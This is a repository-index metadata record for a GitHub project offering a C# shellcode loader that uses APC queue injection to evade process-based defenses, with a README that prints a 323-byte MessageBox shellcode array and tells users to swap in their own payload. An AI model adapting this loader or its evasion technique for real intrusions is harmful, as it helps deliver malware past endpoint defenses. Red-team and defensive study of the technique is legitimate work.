{"id":19369437,"url":"https://github.com/kara-4search/apc_shellcodeexecution_csharp","last_synced_at":"2025-04-23T15:31:37.464Z","repository":{"id":136106307,"uuid":"400152273","full_name":"Kara-4search/APC_ShellcodeExecution_CSharp","owner":"Kara-4search","description":"Shellcode Load or execute via \"APC technic\"","archived":false,"fork":false,"pushed_at":"2021-08-30T10:07:12.000Z","size":33,"stargazers_count":13,"open_issues_count":0,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-02T17:01:34.690Z","etag":null,"topics":["bypass","csharp","edr","hacking","injection","pentest","redteam","shellcode-injection","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Kara-4search.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-08-26T11:58:23.000Z","updated_at":"2024-09-03T18:02:40.000Z","dependencies_parsed_at":null,"dependency_job_id":"c7d240e3-f45f-4e68-b2d7-ecce5c3a0515","html_url":"https://github.com/Kara-4search/APC_ShellcodeExecution_CSharp","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FAPC_ShellcodeExecution_CSharp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FAPC_ShellcodeExecution_CSharp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FAPC_ShellcodeExecution_CSharp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FAPC_ShellcodeExecution_CSharp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kara-4search","download_url":"https://codeload.github.com/Kara-4search/APC_ShellcodeExecution_CSharp/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250460419,"owners_count":21434248,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","csharp","edr","hacking","injection","pentest","redteam","shellcode-injection","shellcode-loader"],"created_at":"2024-11-10T08:11:19.041Z","updated_at":"2025-04-23T15:31:37.459Z","avatar_url":"https://github.com/Kara-4search.png","language":"C#","readme":"# APC_ShellcodeExecution_CSharp\n\nblog link: may not gonna update\n\n- Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. \n- APC injection is a method of executing arbitrary code in the address space of a separate live process.\n- QueueUserAPC function, Adds a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread.\n- Only tested in Win10/x64, works fine, It should works on x86.\n- The shellcode below is a messagebox\n```\n            /* MessageBox */\n            byte[] buf1 = new byte[323] {\n                0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,\n                0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,\n                0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,\n                0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,\n                0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,\n                0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,\n                0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,\n                0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,\n                0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,\n                0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,\n                0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,\n                0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,\n                0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,\n                0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,\n                0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,\n                0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,\n                0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,\n                0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,\n                0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,\n                0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,\n                0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73,\n                0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 \n            };\n```\n\n## Usage\n1. Just replace the shellcode with your own\n- Messagebox\n\t![avatar](https://raw.githubusercontent.com/Kara-4search/ProjectPics/main/APC_ShellcodeExecution.png)\n\n## TO-DO list\n- None\n\n## Update history\n- None\n\n## Reference link:\n\t1. http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtQueueApcThread.html\n\t2. https://idiotc4t.com/code-and-dll-process-injection/apc-and-nttestalert-code-execute\n\t3. https://idiotc4t.com/code-and-dll-process-injection/apc-injection\n\t4. https://idiotc4t.com/code-and-dll-process-injection/apc-thread-hijack\n\t5. https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert\n\t6. https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n\t7. https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection\n\t8. https://attack.mitre.org/techniques/T1055/004/\n\t9. https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkara-4search%2Fapc_shellcodeexecution_csharp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkara-4search%2Fapc_shellcodeexecution_csharp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkara-4search%2Fapc_shellcodeexecution_csharp/lists"}